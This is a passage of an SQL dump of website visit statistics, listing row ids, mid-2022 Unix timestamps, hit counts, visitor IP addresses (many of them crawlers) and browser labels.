1,0,0,'157.55.39.144','other'),(563708,1655102458,1,1,0,0,'194.38.20.161','other'),(563709,1655105499,1,1,0,0,'77.88.5.85','other'),(563710,1655106795,1,1,0,0,'91.201.244.114','chrome'),(563711,1655109459,1,1,0,0,'77.88.5.40','chrome'),(563712,1655110056,1,1,0,0,'77.88.5.165','other'),(563713,1655114071,1,1,0,0,'198.235.24.8','other'),(563714,1655128404,1,1,0,0,'178.95.106.33','chrome'),(563715,1655133828,1,1,0,0,'40.122.200.30','other'),(563716,1655145347,1,0,1,0,'66.249.70.75',''),(563717,1655145352,1,0,1,0,'66.249.70.79',''),(563718,1655148032,1,1,0,0,'179.43.146.25','firefox'),(563719,1655152470,1,1,0,0,'66.249.70.79','chrome'),(563720,1655153282,1,1,0,0,'173.252.111.4','other'),(563721,1655153283,1,1,0,0,'173.252.111.20','other'),(563723,1655153284,1,1,0,0,'173.252.111.12','other'),(563724,1655157391,1,1,0,0,'66.249.70.83','chrome'),(563725,1655164824,1,1,0,0,'148.153.97.211','chrome'),(563726,1655175187,2,2,0,0,'89.104.111.96','chrome'),(563727,1655176682,2,2,0,0,'176.53.220.3','chrome'),(563728,1655181531,2,2,0,0,'137.74.27.104','firefox'),(563729,1655195182,1,1,0,0,'66.249.70.75','chrome'),(563730,1655198084,1,1,0,0,'18.170.41.96','firefox'),(563731,1655199503,1,1,0,0,'69.171.249.24','other'),(563732,1655201754,1,1,0,0,'66.249.70.83','chrome'),(563733,1655203395,2,0,2,0,'66.249.70.79',''),(563734,1655206918,1,1,0,0,'66.249.70.75','chrome'),(563735,1655228946,1,1,0,0,'194.38.20.161','other'),(563736,1655231073,1,1,0,0,'45.79.134.143','chrome'),(563737,1655231616,1,0,1,0,'66.249.70.79',''),(563738,1655231664,1,1,0,0,'18.222.58.234','firefox'),(563739,1655231785,1,1,0,0,'66.249.70.75','chrome'),(563740,1655231787,1,1,0,0,'66.249.70.79','chrome'),(563741,1655236085,1,1,0,0,'66.249.70.83','chrome'),(563742,1655256546,5,5,0,0,'13.59.106.189','chrome'),(563743,1655264112,1,1,0,0,'207.46.13.20','other'),(563744,1655270972,1,1,0,0,'77.88.5.135','other'),(563745,1655275134,1,1,0,0,'198.235.24.128','other'),(563746,1655278844,1,1,0,0,'46.219.135.246','chrome'),(563747,1655279468,1,1,0,0,'65.21.206.43','chrome'),(563748,1655282507,1,1,0,0,'66.249.70.79','chrome'),(563749,1655293826,1,1,0,0,'69.171.249.5','other'),(563750,1655295970,1,0,1,0,'66.249.66.82',''),(563751,1655297344,1,1,0,0,'46.211.168.215','chrome'),(563752,1655301927,1,1,0,0,'165.22.101.212','chrome'),(563753,1655303663,1,1,0,0,'65.21.206.44','chrome'),(563754,1655308036,1,1,0,0,'66.249.66.84','chrome'),(563755,1655315659,1,1,0,0,'173.252.111.118','other'),(563756,1655316628,1,1,0,0,'66.249.66.84','chrome'),(563757,1655317158,1,0,1,0,'66.249.66.158',''),(563758,1655317159,1,0,1,0,'66.249.66.129',''),(563759,1655319304,1,0,1,0,'66.249.66.207',''),(563760,1655327286,2,2,0,0,'20.28.152.103','chrome'),(563761,1655328899,1,1,0,0,'47.91.87.213','firefox'),(563762,1655343173,1,1,0,0,'176.120.99.34','chrome'),(563763,1655349108,1,0,1,0,'66.249.66.209',''),(563764,1655349109,1,1,0,0,'66.249.66.7','chrome'),(563765,1655349129,1,0,1,0,'66.249.66.82',''),(563766,1655355569,1,1,0,0,'176.120.99.34','chrome'),(563767,1655362070,1,1,0,0,'157.55.39.92','other'),(563768,1655362537,2,2,0,0,'66.249.66.63','chrome'),(563769,1655362578,1,0,1,0,'66.249.66.37',''),(563770,1655362599,1,0,1,0,'66.249.66.34',''),(563771,1655372410,1,1,0,0,'18.237.146.241','chrome'),(563772,1655372433,1,1,0,0,'54.201.27.135','chrome'),(563773,1655373945,1,1,0,0,'65.21.206.43','chrome'),(563774,1655376853,1,1,0,0,'93.158.161.44','other'),(563775,1655384611,1,1,0,0,'31.13.103.4','other'),(563776,1655392667,1,1,0,0,'188.163.16.186','chrome'),(563777,1655402405,1,0,1,0,'66.249.66.83',''),(563778,1655423619,1,1,0,0,'157.55.39.144','other'),(563779,1655437258,1,1,0,0,'207.46.13.107','other'),(563780,1655439374,1,1,0,0,'66.249.66.37','chrome'),(563781,1655441251,3,3,0,0,'188.166.228.39','other'),(563782,1655453802,1,1,0,0,'20.214.8.177','firefox'),(563783,1655459000,1,1,0,0,'66.249.66.63','chrome'),(563784,1655463882,1,1,0,0,'66.249.66.159','chrome'),(563785,1655465200,1,1,0,0,'66.249.66.159','chrome'),(563786,1655468425,1,1,0,0,'66.249.66.5','chrome'),(563787,1655478161,1,1,0,0,'20.191.45.212','other'),(563788,1655484299,1,1,0,0,'65.21.206.44','chrome'),(563789,1655484485,1,1,0,0,'93.158.161.70','other'),(563790,1655489685,1,1,0,0,'182.92.65.39','firefox'),(563791,1655490968,1,1,0,0,'66.249.66.5','chrome'),(563792,1655492520,1,1,0,0,'66.249.66.5','chrome'),(563793,1655499887,1,0,1,0,'66.249.66.7',''),(563794,1655499947,1,0,1,0,'66.249.66.82',''),(563795,1655506419,1,1,0,0,'66.249.66.7','chrome'),(563796,1655510596,1,1,0,0,'66.249.66.129','chrome'),(563797,1655510659,1,1,0,0,'94.247.172.129','other'),(563798,1655511535,1,1,0,0,'198.235.24.142','other'),(563799,1655511782,1,1,0,0,'66.249.66.82','chrome'),(563800,1655518117,1,1,0,0,'66.249.66.159','chrome'),(563801,1655521341,1,1,0,0,'93.158.161.49','other'),(563802,1655527521,1,1,0,0,'205.210.31.23','other'),(563803,1655530859,1,1,0,0,'45.129.18.154','chrome'),(563804,1655542081,1,1,0,0,'198.235.24.131','other'),(563805,1655544882,1,1,0,0,'18.237.229.19','chrome'),(563806,1655544888,1,1,0,0,'54.202.207.181','chrome'),(563807,1655544912,2,2,0,0,'54.202.110.231','chrome'),(563808,1655552384,1,1,0,0,'173.252.83.7','other'),(563809,1655556563,1,1,0,0,'198.235.24.156','other'),(563810,1655564218,1,1,0,0,'65.21.206.46','chrome'),(563811,1655569732,1,1,0,0,'77.88.5.129','other'),(563812,1655585160,2,0,2,0,'66.249.70.75',''),(563813,1655609886,1,1,0,0,'77.88.5.83','other'),(563814,1655622550,1,0,1,0,'66.249.70.75',''),(563815,1655622848,1,1,0,0,'66.249.70.83','chrome'),(563816,1655635467,1,1,0,0,'77.88.5.83','chrome'),(563817,1655635575,1,1,0,0,'93.158.161.70','other'),(563818,1655641173,1,1,0,0,'65.21.206.42','chrome'),(563819,1655658431,1,1,0,0,'77.88.5.23','other'),(563820,1655673228,1,0,1,0,'66.249.66.63',''),(563821,1655685927,1,1,0,0,'66.249.66.209','chrome'),(563822,1655690123,1,1,0,0,'65.21.206.43','chrome'),(563823,1655716990,1,1,0,0,'20.82.144.206','chrome'),(563824,1655717383,1,1,0,0,'194.38.20.161','other'),(563825,1655717616,2,2,0,0,'91.196.178.169','chrome'),(563826,1655718554,1,1,0,0,'91.196.178.169','chrome'),(563827,1655731957,1,1,0,0,'66.249.66.158','chrome'),(563828,1655741970,1,1,0,0,'199.247.21.38','firefox'),(563829,1655750924,1,1,0,0,'176.122.105.147','chrome'),(563830,1655750940,1,1,0,0,'51.15.251.143','other'),(563831,1655756101,1,1,0,0,'198.235.24.155','other'),(563832,1655759612,1,0,1,0,'66.249.66.5',''),(563833,1655786580,1,1,0,0,'95.134.174.148','chrome'),(563834,1655787767,1,1,0,0,'3.250.178.180','chrome'),(563835,1655788133,1,1,0,0,'198.235.24.151','other'),(563836,1655806228,1,1,0,0,'34.217.11.71','chrome'),(563837,1655806503,1,1,0,0,'34.219.248.51','chrome'),(563838,1655806533,2,2,0,0,'34.213.189.75','chrome'),(563839,1655807099,1,1,0,0,'35.164.153.30','chrome'),(563840,1655807479,1,1,0,0,'18.237.58.113','chrome'),(563841,1655814805,1,1,0,0,'13.48.28.130','chrome'),(563842,1655817262,1,1,0,0,'66.249.66.83','chrome'),(563843,1655817786,1,1,0,0,'207.46.13.211','other'),(563844,1655820298,1,0,1,0,'66.249.66.129',''),(563845,1655832431,1,1,0,0,'194.38.20.161','other'),(563846,1655839744,1,1,0,0,'77.88.5.213','other'),(563847,1655846870,1,1,0,0,'205.210.31.140','other'),(563848,1655852481,1,1,0,0,'193.123.109.218','firefox'),(563849,1655875268,1,0,1,0,'66.249.66.63',''),(563850,1655894715,1,1,0,0,'198.235.24.8','other'),(563851,1655899575,1,1,0,0,'77.88.5.232','other'),(563852,1655924269,1,1,0,0,'51.158.66.83','other'),(563853,1655927967,1,1,0,0,'173.252.111.21','other'),(563854,1655928521,14,14,0,0,'158.101.30.206','chrome'),(563855,1655936916,1,0,1,0,'66.249.66.129',''),(563856,1655958769,1,1,0,0,'65.21.206.44','chrome'),(563857,1655961628,1,0,1,0,'66.249.66.59',''),(563858,1655965253,1,1,0,0,'194.38.20.161','other'),(563859,1655976939,1,1,0,0,'35.89.108.63','chrome'),(563860,1655976958,1,1,0,0,'35.90.56.216','chrome'),(563861,1655977140,1,1,0,0,'95.216.106.76','firefox'),(563862,1655977525,2,2,0,0,'34.212.135.16','chrome'),(563863,1655977615,2,2,0,0,'35.89.153.6','chrome'),(563864,1656019465,1,1,0,0,'205.210.31.146','other'),(563865,1656022602,1,1,0,0,'65.21.206.44','chrome'),(563866,1656035713,1,1,0,0,'54.186.108.104','chrome'),(563867,1656048008,1,0,1,0,'66.249.66.57',''),(563868,1656065328,1,1,0,0,'34.222.81.234','chrome'),(563869,1656065330,1,1,0,0,'34.220.238.79','chrome'),(563870,1656070488,1,1,0,0,'207.46.13.45','other'),(563871,1656084844,1,1,0,0,'194.38.20.161','other'),(563872,1656088547,1,1,0,0,'3.91.8.40','chrome'),(563873,1656090915,1,0,1,0,'66.249.66.158',''),(563874,1656112859,1,1,0,0,'205.210.31.23','other'),(563875,1656133848,1,0,1,0,'66.249.66.61',''),(563876,1656137050,1,1,0,0,'185.237.217.11','chrome'),(563877,1656138722,1,1,0,0,'65.21.206.45','chrome'),(563878,1656140466,2,1,1,0,'66.249.66.61',''),(563879,1656151890,1,0,1,0,'66.249.66.61',''),(563880,1656158093,4,4,0,0,'109.70.108.10','chrome'),(563881,1656162268,1,1,0,0,'66.249.66.59','chrome'),(563882,1656163109,1,1,0,0,'207.46.13.211','other'),(563883,1656179098,1,1,0,0,'198.235.24.33','other'),(563884,1656179446,1,1,0,0,'46.211.252.120','chrome'),(563885,1656199160,45,45,0,0,'167.235.53.216','chrome'),(563886,1656214517,1,1,0,0,'69.63.189.3','other'),(563887,1656217733,1,1,0,0,'195.16.79.52','chrome'),(563888,1656218388,1,1,0,0,'198.235.24.134','other'),(563889,1656219378,1,0,1,0,'66.249.66.57',''),(563890,1656221264,1,1,0,0,'15.235.9.75','chrome'),(563891,1656225673,1,1,0,0,'68.183.203.185','firefox'),(563892,1656228199,1,1,0,0,'194.38.20.161','other'),(563893,1656239152,1,1,0,0,'141.43.203.226','firefox'),(563894,1656240639,1,0,1,0,'66.249.70.75',''),(563895,1656240695,1,1,0,0,'66.249.70.79','chrome'),(563896,1656244447,1,1,0,0,'87.250.224.121','other'),(563897,1656255941,1,1,0,0,'66.249.70.75','chrome'),(563898,1656267476,1,1,0,0,'167.235.229.88','firefox'),(563899,1656269607,1,1,0,0,'66.249.70.79','chrome'),(563900,1656271470,1,1,0,0,'66.249.70.75','chrome'),(563901,1656277501,1,1,0,0,'66.249.70.75','chrome'),(563902,1656278342,1,1,0,0,'66.249.70.79','chrome'),(563903,1656280515,1,1,0,0,'31.41.133.66','chrome'),(563904,1656281259,1,0,1,0,'66.249.70.75',''),(563905,1656282855,1,0,1,0,'66.249.70.83',''),(563906,1656283627,1,1,0,0,'66.249.70.79','chrome'),(563907,1656288359,1,1,0,0,'5.58.18.137','other'),(563908,1656291329,1,1,0,0,'66.249.70.79','chrome'),(563909,1656292456,1,0,1,0,'66.249.70.83',''),(563910,1656295489,1,0,1,0,'66.249.70.75',''),(563911,1656297521,1,1,0,0,'66.249.70.83','chrome'),(563912,1656298283,1,1,0,0,'66.249.70.79','chrome'),(563913,1656299876,1,1,0,0,'66.249.70.75','chrome'),(563914,1656300338,1,1,0,0,'157.55.39.56','other'),(563915,1656303781,1,1,0,0,'66.249.70.79','chrome'),(563916,1656305473,1,0,1,0,'66.249.70.75',''),(563917,1656306152,1,1,0,0,'66.249.70.75','chrome'),(563918,1656310387,1,1,0,0,'66.249.70.79','chrome'),(563919,1656311137,1,1,0,0,'205.210.31.22','other'),(563920,1656317142,1,1,0,0,'66.249.70.83','chrome'),(563921,1656323490,1,1,0,0,'173.252.95.1','other'),(563922,1656324654,1,1,0,0,'66.249.70.83','chrome'),(563923,1656338928,1,1,0,0,'66.249.70.79','chrome'),(563924,1656343071,1,1,0,0,'65.21.206.46','chrome'),(563925,1656345652,1,1,0,0,'66.249.70.75','chrome'),(563926,1656348325,1,1,0,0,'66.249.70.75','chrome'),(563927,1656350562,1,1,0,0,'157.245.231.45','firefox'),(563928,1656353769,1,1,0,0,'66.249.70.83','chrome'),(563929,1656354377,1,0,1,0,'66.249.70.79',''),(563930,1656355085,1,0,1,0,'66.249.70.83',''),(563931,1656356979,1,1,0,0,'66.249.70.83','chrome'),(563932,1656357794,1,1,0,0,'81.164.193.28','chrome'),(563933,1656364859,1,1,0,0,'66.249.70.75','chrome'),(563934,1656369800,1,0,1,0,'66.249.70.75',''),(563935,1656372832,1,1,0,0,'194.38.20.161','other'),(563936,1656375487,1,1,0,0,'66.249.70.83','chrome'),(563937,1656375532,1,1,0,0,'62.45.116.45','firefox'),(563938,1656375680,1,1,0,0,'66.70.151.132','firefox'),(563939,1656375683,1,1,0,0,'135.181.141.13','other'),(563940,1656376846,1,1,0,0,'65.108.219.201','firefox'),(563941,1656376891,1,1,0,0,'207.180.242.82','firefox'),(563942,1656377101,1,1,0,0,'65.108.213.134','firefox'),(563943,1656377565,1,1,0,0,'66.249.70.75','chrome'),(563944,1656380772,1,0,1,0,'66.249.70.83',''),(563945,1656382076,1,1,0,0,'198.235.24.29','other'),(563946,1656390153,1,1,0,0,'66.249.70.75','chrome'),(563947,1656391040,1,0,1,0,'66.249.70.83',''),(563948,1656395491,1,1,0,0,'198.235.24.12','other'),(563949,1656400026,1,1,0,0,'66.249.70.83','chrome'),(563950,1656400155,1,1,0,0,'207.46.13.45','other'),(563951,1656433454,1,1,0,0,'173.252.83.19','other'),(563952,1656434893,1,0,1,0,'66.249.70.75',''),(563953,1656436089,1,1,0,0,'66.249.70.75','chrome'),(563954,1656437527,1,1,0,0,'66.249.70.83','chrome'),(563955,1656442309,1,1,0,0,'5.39.84.56','chrome'),(563956,1656442676,1,1,0,0,'78.27.136.235','chrome'),(563957,1656448257,1,1,0,0,'66.249.70.75','chrome'),(563958,1656454293,1,0,1,0,'66.249.70.75',''),(563959,1656454772,1,1,0,0,'66.249.70.83','chrome'),(563960,1656467084,5,5,0,0,'3.145.171.33','chrome'),(563961,1656477439,1,1,0,0,'194.38.20.161','other'),(563962,1656479196,1,0,1,0,'66.249.70.83',''),(563963,1656482392,1,1,0,0,'148.153.98.19','chrome'),(563964,1656483477,1,1,0,0,'91.196.178.169','chrome'),(563965,1656488851,1,1,0,0,'66.249.70.83','chrome'),(563966,1656493820,1,1,0,0,'66.249.70.79','chrome'),(563967,1656497901,1,1,0,0,'87.250.224.6','other'),(563968,1656507340,1,1,0,0,'66.249.70.83','chrome'),(563969,1656507928,1,1,0,0,'66.249.70.79','chrome'),(563970,1656512605,1,1,0,0,'65.21.206.45','chrome'),(563971,1656513792,1,1,0,0,'54.190.29.79','firefox'),(563972,1656518231,1,1,0,0,'193.123.109.218','firefox'),(563973,1656519271,1,1,0,0,'65.21.206.45','chrome'),(563974,1656522172,1,1,0,0,'198.235.24.133','other'),(563975,1656525933,1,1,0,0,'178.18.136.235','firefox'),(563976,1656527341,1,1,0,0,'205.210.31.148','other'),(563977,1656528909,1,1,0,0,'66.249.70.83','chrome'),(563978,1656528977,1,1,0,0,'198.235.24.128','other'),(563979,1656529408,1,1,0,0,'66.249.70.79','chrome'),(563980,1656530652,1,1,0,0,'66.249.70.79','chrome'),(563981,1656531928,2,1,1,0,'66.249.70.79',''),(563982,1656531929,1,0,1,0,'66.249.70.83',''),(563983,1656531998,1,1,0,0,'66.249.70.79','chrome'),(563984,1656534495,1,0,1,0,'66.249.70.83',''),(563985,1656534721,1,0,1,0,'66.249.70.75',''),(563986,1656536164,1,0,1,0,'66.249.70.75',''),(563987,1656536583,1,1,0,0,'198.235.24.10','other'),(563988,1656541477,1,0,1,0,'66.249.70.79',''),(563989,1656541905,1,0,1,0,'66.249.70.83',''),(563990,1656545895,1,1,0,0,'66.249.70.79','chrome'),(563991,1656547365,1,1,0,0,'66.249.70.83','chrome'),(563992,1656557271,1,1,0,0,'66.249.70.75','chrome'),(563993,1656557283,1,1,0,0,'66.249.70.79','chrome'),(563994,1656563849,1,0,1,0,'66.249.70.83',''),(563995,1656577792,1,1,0,0,'185.181.60.12','chrome'),(563996,1656583119,2,2,0,0,'91.218.88.17','chrome'),(563997,1656585137,1,1,0,0,'66.249.70.75','chrome'),(563998,1656587940,1,1,0,0,'66.249.70.83','chrome'),(563999,1656590242,1,1,0,0,'46.201.113.188','chrome'),(564000,1656590264,1,1,0,0,'66.249.70.83','chrome'),(564001,1656590768,1,1,0,0,'66.249.70.75','chrome'),(564002,1656590860,1,1,0,0,'66.249.70.79','chrome'),(564003,1656597765,1,1,0,0,'194.38.20.161','other'),(564004,1656621276,1,1,0,0,'205.210.31.19','other'),(564005,1656622775,1,1,0,0,'207.46.13.83','other'),(564006,1656637424,5,5,0,0,'200.62.44.154','chrome'),(564007,1656651873,1,0,1,0,'66.249.70.75',''),(564008,1656653326,1,1,0,0,'128.199.13.178','other'),(564009,1656659024,1,1,0,0,'65.21.206.46','chrome'),(564010,1656685106,3,3,0,0,'46.211.144.246','chrome'),(564011,1656691597,1,0,1,0,'66.249.70.83',''),(564012,1656692934,1,1,0,0,'142.54.177.162','chrome'),(564013,1656693748,81,81,0,0,'20.28.152.103','chrome'),(564014,1656716124,1,1,0,0,'194.38.20.161','other'),(564015,1656736805,1,1,0,0,'77.246.183.70','firefox'),(564016,1656737893,1,1,0,0,'207.46.13.45','other'),(564017,1656740281,1,1,0,0,'91.196.178.52','chrome'),(564018,1656741748,4,4,0,0,'88.99.165.190','chrome'),(564019,1656750694,2,2,0,0,'65.154.226.168','chrome'),(564020,1656750724,1,1,0,0,'205.169.39.21','chrome'),(564021,1656752767,1,0,1,0,'66.249.70.83',''),(564022,1656754288,1,1,0,0,'20.191.45.212','other'),(564023,1656754780,1,1,0,0,'35.89.34.239','chrome'),(564024,1656754786,1,1,0,0,'34.219.39.253','chrome'),(564025,1656754806,1,1,0,0,'54.149.110.67','chrome'),(564026,1656754808,5,5,0,0,'20.57.153.211','chrome'),(564027,1656759316,1,1,0,0,'31.13.127.120','other'),(564028,1656759481,1,1,0,0,'64.246.161.190','firefox'),(564029,1656778468,1,1,0,0,'207.46.13.45','other'),(564030,1656780934,1,1,0,0,'207.46.13.211','other'),(564031,1656781398,1,1,0,0,'31.13.127.2','other'),(564032,1656781429,2,2,0,0,'31.13.127.15','other'),(564033,1656781430,1,1,0,0,'31.13.127.20','other'),(564034,1656781431,1,1,0,0,'31.13.127.1','other'),(564035,1656787396,1,1,0,0,'207.46.13.107','other'),(564036,1656802846,1,1,0,0,'31.13.127.23','other'),(564037,1656802868,1,1,0,0,'173.252.79.9','other'),(564038,1656830103,1,1,0,0,'185.237.217.11','chrome'),(564039,1656836274,1,1,0,0,'205.210.31.15','other'),(564040,1656836816,1,1,0,0,'194.38.20.161','other'),(564041,1656839169,1,0,1,0,'66.249.70.79',''),(564042,1656858333,1,1,0,0,'87.250.224.57','other'),(564043,1656859752,1,1,0,0,'5.255.253.189','other'),(564044,1656866910,1,1,0,0,'157.245.38.42','firefox'),(564045,1656872775,1,1,0,0,'207.46.13.107','other'),(564046,1656873449,2,2,0,0,'194.44.21.10','chrome'),(564047,1656898377,5,5,0,0,'188.40.21.51','chrome'),(564048,1656915220,1,1,0,0,'20.191.45.212','other'),(564049,1656918706,1,1,0,0,'66.249.70.79','chrome'),(564050,1656921406,1,1,0,0,'66.249.70.75','chrome'),(564051,1656923963,1,0,1,0,'66.249.70.79',''),(564052,1656931408,1,1,0,0,'176.105.220.121','chrome'),(564053,1656940217,2,2,0,0,'44.200.39.145','chrome'),(564054,1656940804,1,1,0,0,'205.210.31.10','other'),(564055,1656945454,1,1,0,0,'207.46.13.84','other'),(564056,1656953078,1,1,0,0,'194.38.20.161','other'),(564057,1656958073,1,1,0,0,'65.21.206.45','chrome'),(564058,1656961541,1,1,0,0,'173.252.95.6','other'),(564059,1656961543,1,1,0,0,'173.252.107.18','other'),(564060,1656968688,1,0,1,0,'66.249.70.83',''),(564061,1656984340,1,1,0,0,'193.123.115.104','firefox'),(564062,1656988535,1,1,0,0,'66.249.70.79','chrome'),(564063,1657010403,1,0,1,0,'66.249.70.83',''),(564064,1657013804,1,1,0,0,'66.249.70.75','chrome'),(564065,1657023515,30,30,0,0,'185.158.115.77','msie'),(564066,1657024068,1,0,1,0,'66.249.70.75',''),(564067,1657024069,1,1,0,0,'66.249.70.75','chrome'),(564068,1657024082,1,0,1,0,'66.249.70.79',''),(564069,1657041125,1,1,0,0,'66.249.70.83','chrome'),(564070,1657045194,1,1,0,0,'46.138.244.247','chrome'),(564071,1657046278,1,1,0,0,'194.163.132.194','firefox'),(564072,1657049310,1,1,0,0,'66.249.70.83','chrome'),(564073,1657060932,57,57,0,0,'20.102.113.59','firefox'),(564074,1657062417,3,1,2,0,'66.249.70.83',''),(564075,1657067087,1,1,0,0,'167.172.74.27','chrome'),(564076,1657072137,1,1,0,0,'65.21.206.44','chrome'),(564077,1657085456,1,1,0,0,'20.117.80.92','firefox'),(564078,1657096941,1,0,1,0,'66.249.70.83',''),(564079,1657099102,1,1,0,0,'35.86.165.147','chrome'),(564080,1657099171,1,1,0,0,'34.217.99.113','chrome'),(564081,1657099179,2,2,0,0,'35.89.162.119','chrome'),(564082,1657099227,2,2,0,0,'52.37.157.101','chrome'),(564083,1657099882,2,2,0,0,'35.89.163.248','chrome'),(564084,1657101784,5,5,0,0,'20.110.242.199','chrome'),(564085,1657115331,1,0,1,0,'66.249.66.94',''),(564086,1657115348,1,1,0,0,'65.154.226.220','chrome'),(564087,1657115710,1,1,0,0,'65.154.226.166','chrome'),(564088,1657134078,1,1,0,0,'185.14.56.92','firefox'),(564089,1657135857,1,1,0,0,'205.210.31.21','other'),(564090,1657141961,1,1,0,0,'205.210.31.15','other'),(564091,1657143270,1,1,0,0,'207.46.13.211','other'),(564092,1657150130,1,1,0,0,'205.210.31.35','other'),(564093,1657155374,1,1,0,0,'40.117.100.224','chrome'),(564094,1657155400,1,0,1,0,'66.249.66.59',''),(564095,1657155727,1,1,0,0,'198.235.24.132','other'),(564096,1657170520,5,5,0,0,'35.211.139.15','chrome'),(564097,1657171759,1,1,0,0,'31.13.127.7','other'),(564098,1657183757,1,0,1,0,'66.249.66.5',''),(564099,1657183805,1,1,0,0,'69.63.189.5','other'),(564100,1657194753,10,10,0,0,'74.50.68.173','other'),(564101,1657194872,3,3,0,0,'74.50.68.173','chrome'),(564102,1657198384,1,1,0,0,'194.38.20.161','other'),(564103,1657201380,1,1,0,0,'45.129.18.112','chrome'),(564104,1657212362,41,41,0,0,'162.214.144.76','chrome'),(564105,1657216620,1,0,1,0,'66.249.70.79',''),(564106,1657216633,1,1,0,0,'66.249.70.75','chrome'),(564107,1657217950,1,1,0,0,'207.46.13.45','other'),(564108,1657236787,1,1,0,0,'205.210.31.135','other'),(564109,1657242767,1,1,0,0,'20.214.236.182','other'),(564110,1657246509,1,1,0,0,'65.21.206.44','chrome'),(564111,1657260238,1,1,0,0,'31.13.127.15','other'),(564112,1657268931,1,1,0,0,'66.249.70.79','chrome'),(564113,1657275171,1,0,1,0,'66.249.70.79',''),(564114,1657280294,1,1,0,0,'31.13.127.25','other'),(564115,1657280567,1,1,0,0,'65.21.206.43','chrome'),(564116,1657281579,1,1,0,0,'46.211.15.186','chrome'),(564117,1657286888,1,1,0,0,'66.249.70.79','chrome'),(564118,1657287721,1,1,0,0,'66.249.70.83','chrome'),(564119,1657287872,1,0,1,0,'66.249.70.75',''),(564120,1657308123,1,1,0,0,'130.61.143.194','firefox'),(564121,1657308545,1,1,0,0,'205.210.31.24','other'),(564122,1657321240,1,1,0,0,'205.210.31.134','other'),(564123,1657322344,1,1,0,0,'194.38.20.161','other'),(564124,1657322478,5,5,0,0,'31.47.234.44','chrome'),(564125,1657340332,1,1,0,0,'65.21.206.45','chrome'),(564126,1657345794,1,1,0,0,'207.46.13.83','other'),(564127,1657345945,1,1,0,0,'207.46.13.84','other'),(564128,1657348850,1,1,0,0,'173.252.83.15','other'),(564129,1657355702,1,1,0,0,'66.249.70.5','chrome'),(564130,1657355783,1,0,1,0,'66.249.70.9',''),(564131,1657360373,1,0,1,0,'66.249.70.9',''),(564132,1657366369,1,1,0,0,'66.249.70.5','chrome'),(564133,1657415063,2,2,0,0,'141.8.142.76','other'),(564134,1657415797,1,1,0,0,'207.46.13.83','other'),(564135,1657419211,2,2,0,0,'65.154.226.220','chrome'),(564136,1657419226,1,1,0,0,'65.154.226.166','chrome'),(564137,1657422546,2,2,0,0,'20.28.191.9','other'),(564138,1657438549,1,1,0,0,'198.235.24.21','other'),(564139,1657444590,1,1,0,0,'54.200.182.34','chrome'),(564140,1657445160,1,1,0,0,'54.190.51.93','chrome'),(564141,1657445802,2,2,0,0,'34.219.74.243','chrome'),(564142,1657446756,1,0,1,0,'66.249.70.7',''),(564143,1657448687,1,0,1,0,'66.249.70.5',''),(564144,1657450503,1,0,1,0,'66.249.70.5',''),(564145,1657450531,1,1,0,0,'66.249.70.7','chrome'),(564146,1657451228,1,1,0,0,'194.38.20.161','other'),(564147,1657471105,1,1,0,0,'157.55.39.56','other'),(564148,1657474778,1,1,0,0,'178.62.9.122','firefox'),(564149,1657491770,1,1,0,0,'87.250.224.69','other'),(564150,1657494811,1,1,0,0,'65.21.206.45','chrome'),(564151,1657503683,1,1,0,0,'95.108.213.45','other'),(564152,1657505529,1,1,0,0,'198.235.24.12','other'),(564153,1657527524,1,1,0,0,'66.249.70.7','chrome'),(564154,1657528057,1,1,0,0,'65.21.206.43','chrome'),(564155,1657532356,1,1,0,0,'34.209.176.212','chrome'),(564156,1657533062,1,0,1,0,'66.249.70.5',''),(564157,1657559512,1,1,0,0,'5.53.115.178','chrome'),(564158,1657573154,1,1,0,0,'66.249.70.5','chrome'),(564159,1657574234,1,1,0,0,'66.249.70.7','chrome'),(564160,1657576242,1,1,0,0,'174.138.62.253','other'),(564161,1657585303,1,1,0,0,'205.210.31.3','other'),(564162,1657592250,1,1,0,0,'66.249.70.75','chrome'),(564163,1657594077,1,1,0,0,'66.249.70.79','chrome'),(564164,1657600705,1,1,0,0,'5.255.253.158','other'),(564165,1657601563,1,1,0,0,'5.255.253.124','other'),(564166,1657602252,1,1,0,0,'213.180.203.5','other'),(564167,1657602458,1,1,0,0,'66.249.70.75','chrome'),(564168,1657605574,1,1,0,0,'66.249.70.79','chrome'),(564169,1657613859,2,2,0,0,'66.249.70.83','chrome'),(564170,1657619836,1,0,1,0,'66.249.70.75',''),(564171,1657623915,1,1,0,0,'66.249.70.75','chrome'),(564172,1657634531,1,1,0,0,'66.249.70.79','chrome'),(564173,1657635811,2,2,0,0,'66.249.70.83','chrome'),(564174,1657637986,1,1,0,0,'66.249.70.83','chrome'),(564175,1657642516,1,1,0,0,'66.249.70.83','chrome'),(564176,1657650062,1,1,0,0,'85.234.145.160','firefox'),(564177,1657651048,1,1,0,0,'68.183.48.37','other'),(564178,1657651450,1,1,0,0,'65.154.226.220','chrome'),(564179,1657651912,1,1,0,0,'65.154.226.168','chrome'),(564180,1657673894,5,5,0,0,'18.191.151.79','chrome'),(564181,1657677896,1,0,1,0,'66.249.70.83',''),(564182,1657678790,1,1,0,0,'65.21.206.43','chrome'),(564183,1657688672,1,1,0,0,'213.180.203.5','other'),(564184,1657693754,20,20,0,0,'45.140.185.39','chrome'),(564185,1657693826,1,1,0,0,'65.21.206.44','chrome'),(564186,1657705890,1,0,1,0,'66.249.70.79',''),(564187,1657707010,1,1,0,0,'35.89.95.87','chrome'),(564188,1657707011,1,1,0,0,'34.211.39.17','chrome'),(564189,1657707040,2,2,0,0,'18.236.170.170','chrome'),(564190,1657708898,1,1,0,0,'205.210.31.3','other'),(564191,1657710003,1,1,0,0,'45.142.122.34','other'),(564192,1657716369,1,1,0,0,'205.210.31.26','other'),(564193,1657721000,1,1,0,0,'205.210.31.30','other'),(564194,1657735648,1,1,0,0,'198.235.24.150','other'),(564195,1657743989,1,0,1,0,'66.249.70.75',''),(564196,1657746526,1,1,0,0,'205.210.31.136','other'),(564197,1657770555,1,1,0,0,'141.8.142.80','chrome'),(564198,1657784231,21,21,0,0,'20.25.108.245','chrome'),(564199,1657784581,1,1,0,0,'207.46.13.83','other'),(564200,1657785575,10,10,0,0,'45.142.122.34','chrome'),(564201,1657792140,1,0,1,0,'66.249.70.79',''),(564202,1657792872,1,1,0,0,'45.142.122.34','chrome'),(564203,1657794301,1,1,0,0,'45.142.122.34','chrome'),(564204,1657800707,5,5,0,0,'95.173.103.17','chrome'),(564205,1657800708,1,1,0,0,'95.173.103.17','other'),(564208,1657830375,1,1,0,0,'65.21.206.44','chrome'),(564209,1657835271,1,1,0,0,'194.39.227.4','other'),(564210,1657836568,1,1,0,0,'66.249.70.75','chrome'),(564211,1657840619,2,2